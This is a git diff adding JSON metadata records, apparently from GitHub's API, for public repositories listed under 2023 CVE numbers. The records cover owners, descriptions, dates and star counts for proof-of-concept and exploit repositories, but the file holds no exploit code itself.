file diff --git a/2023/CVE-2023-44961.json b/2023/CVE-2023-44961.json new file mode 100644 index 0000000000..090cbb9221 --- /dev/null +++ b/2023/CVE-2023-44961.json @@ -0,0 +1,33 @@ +[ + { + "id": 700732996, + "name": "CVE-2023-44961", + "full_name": "ggb0n\/CVE-2023-44961", + "owner": { + "login": "ggb0n", + "id": 41365666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4", + "html_url": "https:\/\/github.com\/ggb0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44961", + "description": "PoC for CVE-2023-44961", + "fork": false, + "created_at": "2023-10-05T07:27:45Z", + "updated_at": "2023-10-12T05:00:13Z", + "pushed_at": "2023-10-12T05:00:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44962.json b/2023/CVE-2023-44962.json new file mode 100644 index 0000000000..a578ec550a --- /dev/null +++ b/2023/CVE-2023-44962.json @@ -0,0 +1,33 @@ +[ + { + "id": 700738589, + "name": "CVE-2023-44962", + "full_name": "ggb0n\/CVE-2023-44962", + "owner": { + "login": "ggb0n", + "id": 41365666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4", + "html_url": "https:\/\/github.com\/ggb0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44962", + "description": "PoC for CVE-2023-44962", + "fork": false, + "created_at": "2023-10-05T07:43:07Z", + "updated_at": "2023-12-03T18:02:25Z", + "pushed_at": "2023-10-11T04:58:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44976.json b/2023/CVE-2023-44976.json new file mode 100644 index 0000000000..8b4a7b4f7d --- /dev/null +++ b/2023/CVE-2023-44976.json @@ -0,0 +1,33 @@ +[ + { + "id": 699037101, + "name": "BadRentdrv2", + "full_name": "keowu\/BadRentdrv2", + "owner": { + "login": "keowu", + "id": 42323126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42323126?v=4", + "html_url": "https:\/\/github.com\/keowu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keowu\/BadRentdrv2", + "description": "A vulnerable driver exploited by me (BYOVD) that is capable of terminating several EDRs and antivirus software in the market, rendering them ineffective, working for both x32 and x64(CVE-2023-44976).", + "fork": false, + "created_at": "2023-10-01T18:24:38Z", + "updated_at": "2025-01-05T12:06:15Z", + "pushed_at": "2024-12-26T13:43:18Z", + "stargazers_count": 91, + "watchers_count": 91, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 91, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45158.json b/2023/CVE-2023-45158.json new file mode 100644 index 0000000000..ceb59b286f --- /dev/null +++ b/2023/CVE-2023-45158.json @@ -0,0 +1,33 @@ +[ + { + "id": 714422608, + "name": "CVE-2023-45158", + "full_name": "Evan-Zhangyf\/CVE-2023-45158", + "owner": { + "login": "Evan-Zhangyf", + "id": 53845683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53845683?v=4", + "html_url": "https:\/\/github.com\/Evan-Zhangyf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Evan-Zhangyf\/CVE-2023-45158", + "description": null, + "fork": false, + "created_at": "2023-11-04T21:14:09Z", + "updated_at": "2023-12-02T11:51:12Z", + "pushed_at": "2023-11-04T21:22:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45182.json b/2023/CVE-2023-45182.json new file mode 100644 index 0000000000..df9582214f --- /dev/null +++ b/2023/CVE-2023-45182.json @@ -0,0 +1,33 @@ +[ + { + "id": 747276396, + "name": "CVE-2023-45182", + "full_name": "afine-com\/CVE-2023-45182", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45182", + "description": "IBM i Access Client Solutions < 1.1.9.4 - Weak password encryption", + "fork": false, + "created_at": "2024-01-23T16:05:55Z", + "updated_at": "2024-01-23T16:08:21Z", + "pushed_at": "2024-01-26T10:42:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45184.json b/2023/CVE-2023-45184.json new file mode 100644 index 0000000000..1df61b5321 --- /dev/null +++ b/2023/CVE-2023-45184.json @@ -0,0 +1,33 @@ +[ + { + "id": 732046716, + "name": "CVE-2023-45184", + "full_name": "afine-com\/CVE-2023-45184", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45184", + "description": "IBM i Access Client Solution < 1.1.9.4 - Local server broken access control.", + "fork": false, + "created_at": "2023-12-15T14:04:32Z", + "updated_at": "2023-12-15T14:06:24Z", + "pushed_at": "2024-01-26T10:49:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45185.json b/2023/CVE-2023-45185.json new file mode 100644 index 0000000000..2285cefe44 --- /dev/null +++ b/2023/CVE-2023-45185.json @@ -0,0 +1,33 @@ +[ + { + "id": 747714734, + "name": "CVE-2023-45185", + "full_name": "afine-com\/CVE-2023-45185", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45185", + "description": "IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation", + "fork": false, + "created_at": "2024-01-24T13:53:36Z", + "updated_at": "2024-01-24T13:53:37Z", + "pushed_at": "2024-01-24T13:55:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45239.json b/2023/CVE-2023-45239.json new file mode 100644 index 0000000000..a8b557ef05 --- /dev/null +++ b/2023/CVE-2023-45239.json @@ -0,0 +1,33 @@ +[ + { + "id": 793726017, + "name": "tac_plus-pre-auth-rce", + "full_name": "takeshixx\/tac_plus-pre-auth-rce", + "owner": { + "login": "takeshixx", + "id": 5837896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4", + "html_url": "https:\/\/github.com\/takeshixx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takeshixx\/tac_plus-pre-auth-rce", + "description": "tac_plus Pre-Auth Remote Command Execution Vulnerability (CVE-2023-45239 & CVE-2023-48643)", + "fork": false, + "created_at": "2024-04-29T18:48:57Z", + "updated_at": "2024-05-17T08:41:48Z", + "pushed_at": "2024-05-16T09:08:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45280.json b/2023/CVE-2023-45280.json new file mode 100644 index 0000000000..06b256af09 --- /dev/null +++ b/2023/CVE-2023-45280.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209539, + "name": "CVE-2023-45280-1", + "full_name": "miguelc49\/CVE-2023-45280-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:21Z", + "updated_at": "2024-04-14T17:41:05Z", + "pushed_at": "2024-04-15T22:56:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209568, + "name": "CVE-2023-45280-3", + "full_name": "miguelc49\/CVE-2023-45280-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:27Z", + "updated_at": "2024-04-14T17:41:14Z", + "pushed_at": "2024-04-15T22:58:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786350916, + "name": "CVE-2023-45280-2", + "full_name": "miguelc49\/CVE-2023-45280-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:22:00Z", + "updated_at": "2024-04-14T17:41:11Z", + "pushed_at": "2024-04-15T22:59:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45288.json b/2023/CVE-2023-45288.json new file mode 100644 index 0000000000..7c727a5ed2 --- /dev/null +++ b/2023/CVE-2023-45288.json @@ -0,0 +1,33 @@ +[ + { + "id": 785588887, + "name": "cont-flood-poc", + "full_name": "hex0punk\/cont-flood-poc", + "owner": { + "login": "hex0punk", + "id": 1915998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1915998?v=4", + "html_url": "https:\/\/github.com\/hex0punk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hex0punk\/cont-flood-poc", + "description": "PoC for CVE-2023-45288, continuation flood vulnerability", + "fork": false, + "created_at": "2024-04-12T07:36:39Z", + "updated_at": "2024-10-23T22:50:22Z", + "pushed_at": "2024-04-16T03:01:52Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4542.json b/2023/CVE-2023-4542.json new file mode 100644 index 0000000000..44481ea3bf --- /dev/null +++ b/2023/CVE-2023-4542.json @@ -0,0 +1,33 @@ +[ + { + "id": 676402950, + "name": "CVE-2023-4542", + "full_name": "PumpkinBridge\/CVE-2023-4542", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/CVE-2023-4542", + "description": null, + "fork": false, + "created_at": "2023-08-09T05:57:13Z", + "updated_at": "2024-08-21T01:54:05Z", + "pushed_at": "2024-08-21T01:53:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45471.json b/2023/CVE-2023-45471.json new file mode 100644 index 0000000000..702c8eeca0 --- /dev/null +++ b/2023/CVE-2023-45471.json @@ -0,0 +1,33 @@ +[ + { + "id": 704942565, + "name": "CVE-2023-45471", + "full_name": "mehdibelhajamor\/CVE-2023-45471", + "owner": { + "login": "mehdibelhajamor", + "id": 62826765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62826765?v=4", + "html_url": "https:\/\/github.com\/mehdibelhajamor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mehdibelhajamor\/CVE-2023-45471", + "description": null, + "fork": false, + "created_at": "2023-10-14T15:20:37Z", + "updated_at": "2023-10-14T16:46:59Z", + "pushed_at": "2023-10-14T16:43:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4549.json b/2023/CVE-2023-4549.json new file mode 100644 index 0000000000..481162c7d4 --- /dev/null +++ b/2023/CVE-2023-4549.json @@ -0,0 +1,33 @@ +[ + { + "id": 695842595, + "name": "CVE-2023-4549", + "full_name": "b0marek\/CVE-2023-4549", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4549", + "description": "Repository for CVE-2023-4549 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T11:57:46Z", + "updated_at": "2023-09-24T11:57:47Z", + "pushed_at": "2023-09-24T12:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45503.json b/2023/CVE-2023-45503.json new file mode 100644 index 0000000000..3f9d1e070c --- /dev/null +++ b/2023/CVE-2023-45503.json @@ -0,0 +1,33 @@ +[ + { + "id": 783460926, + "name": "CVE-2023-45503", + "full_name": "ally-petitt\/CVE-2023-45503", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-45503", + "description": "CVE-2023-45503 Reference", + "fork": false, + "created_at": "2024-04-07T23:43:39Z", + "updated_at": "2024-04-11T22:53:45Z", + "pushed_at": "2024-04-11T22:53:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45540.json b/2023/CVE-2023-45540.json new file mode 100644 index 0000000000..745eed2866 --- /dev/null +++ b/2023/CVE-2023-45540.json @@ -0,0 +1,33 @@ +[ + { + "id": 701340984, + "name": "CVE-2023-45540", + "full_name": "SoundarXploit\/CVE-2023-45540", + "owner": { + "login": "SoundarXploit", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/SoundarXploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SoundarXploit\/CVE-2023-45540", + "description": "CVE-2023-45540 Jorani Leave Management System v1.0.3 – HTML Injection", + "fork": false, + "created_at": "2023-10-06T12:43:54Z", + "updated_at": "2024-05-18T13:29:23Z", + "pushed_at": "2024-05-18T13:29:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45542.json b/2023/CVE-2023-45542.json new file mode 100644 index 0000000000..93de31bbb1 --- /dev/null +++ b/2023/CVE-2023-45542.json @@ -0,0 +1,33 @@ +[ + { + "id": 696796100, + "name": "CVE-2023-45542", + "full_name": "ahrixia\/CVE-2023-45542", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-45542", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on search function.", + "fork": false, + "created_at": "2023-09-26T12:59:31Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-14T04:47:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45657.json b/2023/CVE-2023-45657.json new file mode 100644 index 0000000000..527311f38f --- /dev/null +++ b/2023/CVE-2023-45657.json @@ -0,0 +1,33 @@ +[ + { + "id": 707670270, + "name": "CVE-2023-45657", + "full_name": "RandomRobbieBF\/CVE-2023-45657", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45657", + "description": "Nexter <= 2.0.3 - Authenticated (Subscriber+) SQL Injection via 'to' and 'from'", + "fork": false, + "created_at": "2023-10-20T12:01:15Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-20T12:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4568.json b/2023/CVE-2023-4568.json new file mode 100644 index 0000000000..47d26fa1d3 --- /dev/null +++ b/2023/CVE-2023-4568.json @@ -0,0 +1,40 @@ +[ + { + "id": 803424741, + "name": "CVE-2023-4568", + "full_name": "Cappricio-Securities\/CVE-2023-4568", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-4568", + "description": "PaperCut NG Unauthenticated XMLRPC Functionality", + "fork": false, + "created_at": "2024-05-20T17:41:47Z", + "updated_at": "2024-06-24T08:27:10Z", + "pushed_at": "2024-06-24T08:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-4568", + "papercut", + "pentesting", + "wapt", + "xmlrpc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45777.json b/2023/CVE-2023-45777.json new file mode 100644 index 0000000000..e7106383aa --- /dev/null +++ b/2023/CVE-2023-45777.json @@ -0,0 +1,33 @@ +[ + { + "id": 745800831, + "name": "TheLastBundleMismatch", + "full_name": "michalbednarski\/TheLastBundleMismatch", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/TheLastBundleMismatch", + "description": "Writeup and exploit for CVE-2023-45777, bypass for Intent validation inside AccountManagerService on Android 13 despite \"Lazy Bundle\" mitigation", + "fork": false, + "created_at": "2024-01-20T07:14:06Z", + "updated_at": "2024-12-29T05:49:29Z", + "pushed_at": "2024-01-21T05:04:01Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 82, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45779.json b/2023/CVE-2023-45779.json new file mode 100644 index 0000000000..dfb9335d31 --- /dev/null +++ b/2023/CVE-2023-45779.json @@ -0,0 +1,33 @@ +[ + { + "id": 748840559, + "name": "rtx-cve-2023-45779", + "full_name": "metaredteam\/rtx-cve-2023-45779", + "owner": { + "login": "metaredteam", + "id": 91286942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91286942?v=4", + "html_url": "https:\/\/github.com\/metaredteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/metaredteam\/rtx-cve-2023-45779", + "description": "Proof-of-concept code for Android APEX key reuse vulnerability", + "fork": false, + "created_at": "2024-01-26T21:17:38Z", + "updated_at": "2024-11-25T16:32:46Z", + "pushed_at": "2024-01-31T19:33:59Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 83, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45819.json b/2023/CVE-2023-45819.json new file mode 100644 index 0000000000..19dd0d819b --- /dev/null +++ b/2023/CVE-2023-45819.json @@ -0,0 +1,33 @@ +[ + { + "id": 904799591, + "name": "cve-2023-45819", + "full_name": "philipsinnott\/cve-2023-45819", + "owner": { + "login": "philipsinnott", + "id": 56341190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56341190?v=4", + "html_url": "https:\/\/github.com\/philipsinnott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/philipsinnott\/cve-2023-45819", + "description": "Proof of concept for CVE-2023-45819", + "fork": false, + "created_at": "2024-12-17T15:19:33Z", + "updated_at": "2024-12-26T10:08:48Z", + "pushed_at": "2024-12-17T15:26:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45827.json b/2023/CVE-2023-45827.json new file mode 100644 index 0000000000..1cd7eda966 --- /dev/null +++ b/2023/CVE-2023-45827.json @@ -0,0 +1,33 @@ +[ + { + "id": 845349448, + "name": "CVE-2023-45827", + "full_name": "200101WhoAmI\/CVE-2023-45827", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-45827", + "description": "pp", + "fork": false, + "created_at": "2024-08-21T04:40:33Z", + "updated_at": "2024-08-21T04:41:16Z", + "pushed_at": "2024-08-21T04:41:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45828.json b/2023/CVE-2023-45828.json new file mode 100644 index 0000000000..92ee0804e6 --- /dev/null +++ b/2023/CVE-2023-45828.json @@ -0,0 +1,33 @@ +[ + { + "id": 706068061, + "name": "CVE-2023-45828", + "full_name": "RandomRobbieBF\/CVE-2023-45828", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45828", + "description": "RumbleTalk Live Group Chat <= 6.1.9 - Missing Authorization via handleRequest", + "fork": false, + "created_at": "2023-10-17T08:41:54Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-17T08:58:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45857.json b/2023/CVE-2023-45857.json new file mode 100644 index 0000000000..a19d6a881c --- /dev/null +++ b/2023/CVE-2023-45857.json @@ -0,0 +1,95 @@ +[ + { + "id": 706677544, + "name": "CVE-2023-45857", + "full_name": "valentin-panov\/CVE-2023-45857", + "owner": { + "login": "valentin-panov", + "id": 63700910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63700910?v=4", + "html_url": "https:\/\/github.com\/valentin-panov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/valentin-panov\/CVE-2023-45857", + "description": null, + "fork": false, + "created_at": "2023-10-18T12:19:34Z", + "updated_at": "2023-10-18T19:25:42Z", + "pushed_at": "2023-10-19T15:20:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710123753, + "name": "CVE-2023-45857-Demo", + "full_name": "intercept6\/CVE-2023-45857-Demo", + "owner": { + "login": "intercept6", + "id": 4459220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4459220?v=4", + "html_url": "https:\/\/github.com\/intercept6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intercept6\/CVE-2023-45857-Demo", + "description": "CVE-2023-45857の挙動を確認するデモ", + "fork": false, + "created_at": "2023-10-26T04:18:03Z", + "updated_at": "2024-09-14T07:43:38Z", + "pushed_at": "2023-10-26T04:18:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723193114, + "name": "CVE-2023-45857-Demo", + "full_name": "fuyuooumi1027\/CVE-2023-45857-Demo", + "owner": { + "login": "fuyuooumi1027", + "id": 151829119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151829119?v=4", + "html_url": "https:\/\/github.com\/fuyuooumi1027", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuyuooumi1027\/CVE-2023-45857-Demo", + "description": null, + "fork": false, + "created_at": "2023-11-24T22:42:56Z", + "updated_at": "2023-12-04T06:56:24Z", + "pushed_at": "2023-11-24T22:43:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45866.json b/2023/CVE-2023-45866.json new file mode 100644 index 0000000000..b2310ec1dd --- /dev/null +++ b/2023/CVE-2023-45866.json @@ -0,0 +1,250 @@ +[ + { + "id": 743868830, + "name": "BlueDucky", + "full_name": "pentestfunctions\/BlueDucky", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": 